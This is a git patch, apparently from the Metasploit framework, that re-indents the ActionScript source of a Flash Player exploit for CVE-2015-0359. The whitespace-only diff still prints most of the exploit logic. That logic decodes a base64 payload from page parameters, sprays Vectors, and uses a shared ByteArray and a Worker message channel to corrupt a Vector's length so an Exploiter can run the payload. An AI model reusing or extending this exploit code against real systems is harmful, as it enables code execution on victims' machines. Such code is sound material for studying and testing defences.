From 7202e279186312510473b995f9f51e3de70e4275 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 10 Jun 2015 14:12:26 -0500 Subject: [PATCH] Fix indentation --- .../source/exploits/CVE-2015-0359/Exploit.as | 44 +++++++++---------- 1 file changed, 22 insertions(+), 22 deletions(-) diff --git a/external/source/exploits/CVE-2015-0359/Exploit.as b/external/source/exploits/CVE-2015-0359/Exploit.as index 104ae2d7cd..45e811a4a9 100755 --- a/external/source/exploits/CVE-2015-0359/Exploit.as +++ b/external/source/exploits/CVE-2015-0359/Exploit.as @@ -31,9 +31,9 @@ package private var b64:Base64Decoder = new Base64Decoder() private var worker:Worker private var mc:MessageChannel - private var payload:ByteArray - private var platform:String - private var os:String + private var payload:ByteArray + private var platform:String + private var os:String private var exploiter:Exploiter public function Exploit() @@ -44,20 +44,20 @@ package private function mainThread():void { - platform = LoaderInfo(this.root.loaderInfo).parameters.pl - os = LoaderInfo(this.root.loaderInfo).parameters.os - var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh - var pattern:RegExp = / /g; - b64_payload = b64_payload.replace(pattern, "+") - b64.decode(b64_payload) - payload = b64.toByteArray() + platform = LoaderInfo(this.root.loaderInfo).parameters.pl + os = LoaderInfo(this.root.loaderInfo).parameters.os + var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh + var pattern:RegExp = / /g; + b64_payload = b64_payload.replace(pattern, "+") + b64.decode(b64_payload) + payload = b64.toByteArray() ba.length = 0x1000 ba.shareable = true - for (var i:uint = 0; i < ov.length; i++) { - ov[i] = new Vector.(1014) - ov[i][0] = 0xdeedbeef - } + for (var i:uint = 0; i < ov.length; i++) { + ov[i] = new Vector.(1014) + ov[i][0] = 0xdeedbeef + } for (i = 0; i < ov.length; i += 2) delete(ov[i]) worker = WorkerDomain.current.createWorker(this.loaderInfo.bytes) mc = worker.createMessageChannel(Worker.current) @@ -85,12 +85,12 @@ package mc.send("") while (mc.messageAvailable); - for (i = 0;; i++) { - if (ov[0][i] == 1014 && ov[0][i + 2] == 0xdeedbeef) { + for (i = 0;; i++) { + if (ov[0][i] == 1014 && ov[0][i + 2] == 0xdeedbeef) { ov[0][i] = 0xffffffff break - } - } + } + } ov[0][0xfffffffe] = 1014 mc.send("") @@ -102,8 +102,8 @@ package Logger.log("[*] Exploit - onMessage(): mod: " + mod.toString()) if (mod == 1022) mc.receive() else { - for (var i:uint = 0; i < ov.length; i++) { - if (ov[i].length == 0xffffffff) { + for (var i:uint = 0; i < ov.length; i++) { + if (ov[i].length == 0xffffffff) { uv = ov[i] } else { if (ov[i] != null) { @@ -111,13 +111,13 @@ package ov[i] = null } } - } + } if (uv == null) { Logger.log("[!] Exploit - onMessage(): Corrupted Vector not found") return } exploiter = new Exploiter(this, platform, os, payload, uv) - } + } } } }